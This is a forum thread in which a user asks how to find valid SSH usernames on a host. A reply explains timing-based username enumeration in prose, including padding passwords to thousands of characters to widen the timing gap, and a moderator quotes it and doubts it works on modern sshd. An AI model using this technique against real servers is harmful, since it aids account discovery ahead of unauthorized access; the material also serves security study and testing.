Author Topic: SSH username finder.  (Read 675 times)

0 Members and 7 Guests are viewing this topic.

Offline hack3rcon

  • Peasant
  • *
  • Posts: 80
  • Cookies: -216
    • View Profile
SSH username finder.
« on: September 14, 2015, 08:41:53 am »
Hello.
How can I find the list of username on a host for SSH login?

Thank you.

Offline hcac

  • Serf
  • *
  • Posts: 25
  • Cookies: 4
    • View Profile
Re: SSH username finder.
« Reply #1 on: September 14, 2015, 09:32:50 am »
Edit: xor, that was awesome, thanks.

[Post cleared!]
« Last Edit: September 15, 2015, 07:06:25 am by hcac »

Offline xor

  • Peasant
  • *
  • Posts: 59
  • Cookies: 32
    • View Profile
Re: SSH username finder.
« Reply #2 on: September 15, 2015, 04:59:45 am »
Some implementations of SSH are subject to timing based attacks which can help you enumerate usernames.
Here's an example of what happens.


1. You establish a connection with the server.
2. You send the username and password.
3. The server checks if the username exists, if it doesn't it sends an authentication failed message.
4. If the username does exist, it hashes your password and checks it against the one stored locally.


Step 4 is what you will be attacking. A few server implementations will only perform expensive hash generation if it has determined that there is a username to check against.

This means, if a user doesn't exist, the server will reply really quickly.
If the user does exist, it will take the server a little longer to reply.

You can enhance the effect of this attack by sending HUGE passwords, as many characters as you can throw at it >1000's.
This will slow the server down when it's validating the password, because it has to hash it in chunks and is computationally expensive, slowing the response down.


TL;DR.

Server only checks users password if user exists.
Sending a really long password will slow down the CPU and take longer to reply.
If a user doesn't exist the server replies quickly.
If a user does exist, the server will hash the password and check, using a really long password will slow this process down and let you determine if a username is legitimate or not.


References:

http://www.behindthefirewalls.com/2014/07/openssh-user-enumeration-time-based.html
http://www.devconsole.info/?p=341
http://pentestmonkey.net/tools/timing-attack-checker
http://www.devconsole.info/?p=493


Hopefully this helps.

-- xor

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: SSH username finder.
« Reply #3 on: September 15, 2015, 09:39:07 am »
Some implementations of SSH are subject to timing based attacks which can help you enumerate usernames.
Here's an example of what happens.


1. You establish a connection with the server.
2. You send the username and password.
3. The server checks if the username exists, if it doesn't it sends an authentication failed message.
4. If the username does exist, it hashes your password and checks it against the one stored locally.


Step 4 is what you will be attacking. A few server implementations will only perform expensive hash generation if it has determined that there is a username to check against.

This means, if a user doesn't exist, the server will reply really quickly.
If the user does exist, it will take the server a little longer to reply.

You can enhance the effect of this attack by sending HUGE passwords, as many characters as you can throw at it >1000's.
This will slow the server down when it's validating the password, because it has to hash it in chunks and is computationally expensive, slowing the response down.


TL;DR.

Server only checks users password if user exists.
Sending a really long password will slow down the CPU and take longer to reply.
If a user doesn't exist the server replies quickly.
If a user does exist, the server will hash the password and check, using a really long password will slow this process down and let you determine if a username is legitimate or not.


References:

http://www.behindthefirewalls.com/2014/07/openssh-user-enumeration-time-based.html
http://www.devconsole.info/?p=341
http://pentestmonkey.net/tools/timing-attack-checker
http://www.devconsole.info/?p=493


Hopefully this helps.

-- xor

iirc there is timing randomization in place to prevent such attacks ?
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline xor

  • Peasant
  • *
  • Posts: 59
  • Cookies: 32
    • View Profile
Re: SSH username finder.
« Reply #4 on: September 15, 2015, 09:45:58 am »
Not on all implementations. It's easy to find out by trying.

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: SSH username finder.
« Reply #5 on: September 15, 2015, 10:31:44 am »
Not on all implementations. It's easy to find out by trying.
This would be interesting to test out on embedded boxes,  but I seriously doupt this has any luck on any modern equipped box with a distro packed sshd.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage